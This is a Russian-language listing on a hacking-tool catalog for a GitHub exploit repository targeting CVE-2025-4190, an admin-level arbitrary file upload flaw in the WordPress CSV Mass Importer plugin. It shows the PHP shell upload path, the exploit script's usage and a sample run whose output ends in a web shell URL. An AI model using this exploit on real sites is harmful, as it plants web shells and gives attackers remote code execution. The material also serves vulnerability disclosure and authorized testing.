Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Admin+ Произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-4190
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Admin+ Произвольная загрузка файлов

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2: Произвольная загрузка файлов

WordPress Plugin
CVE
Status
Author


📌 Описание

Плагин CSV Mass Importer (≤ 1.2) для WordPress содержит уязвимость Admin+ Arbitrary File Upload (произвольная загрузка файлов администратором).
Из-за неправильной проверки загружаемых файлов пользователи с высокими привилегиями (например, администраторы) могут загружать произвольные файлы на сервер, даже если это должно быть ограничено — например, в настройках multisite.

Эта уязвимость позволяет атакующему загрузить PHP-оболочки или вредоносные файлы, что приводит к удаленному выполнению кода (RCE) на сервере.

Обнаружено Nxploited (Khaled Alenazi).


🔥 Подробности

  • Название плагина: CSV Mass Importer
  • Затронутая версия: ≤ 1.2
  • Тип уязвимости: Admin+ Arbitrary File Upload
  • CVE: CVE-2025-4190
  • WPVDB ID: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • Первоначальный исследователь: Khaled Alenazi (Nxploited)
  • Сайт автора: https://github.com/Nxploited
  • Подтверждено: ✅

💻 Доказательство концепции (PoC)

Плагин неправильно проверяет загружаемые файлы при использовании функции импорта CSV.
Созданный ZIP-файл, содержащий PHP-оболочку, можно загрузить и распаковать в общедоступную директорию.

Пример пути к оболочке:

<target-url>/wp-content/uploads/cmi-data/nxploited.php

🚀 Использование

Скрипт

В этом репозитории находится готовый эксплойт-скрипт на Python: 4190.py

Меню помощи

python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password

Пример запуска

python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin

Ожидаемый вывод

[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)

🕰 Хронология

  • Опубликовано публично: 2025-04-26 (около 11 дней назад)
  • Добавлено в базу данных: 2025-05-07 (около 1 часа назад)
  • Последнее обновление: 2025-05-07 (около 1 часа назад)

🛡 Ссылки

  • CVE-2025-4190 on WPScan

⚠ Отказ от ответственности

Этот код предоставлен только в образовательных целях.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом.
Используйте ответственно и только в системах, на которые у вас есть разрешение на тестирование.


Обнаружено и разработано Khaled Alenazi (Nxploited) 🌟

Скачать инструмент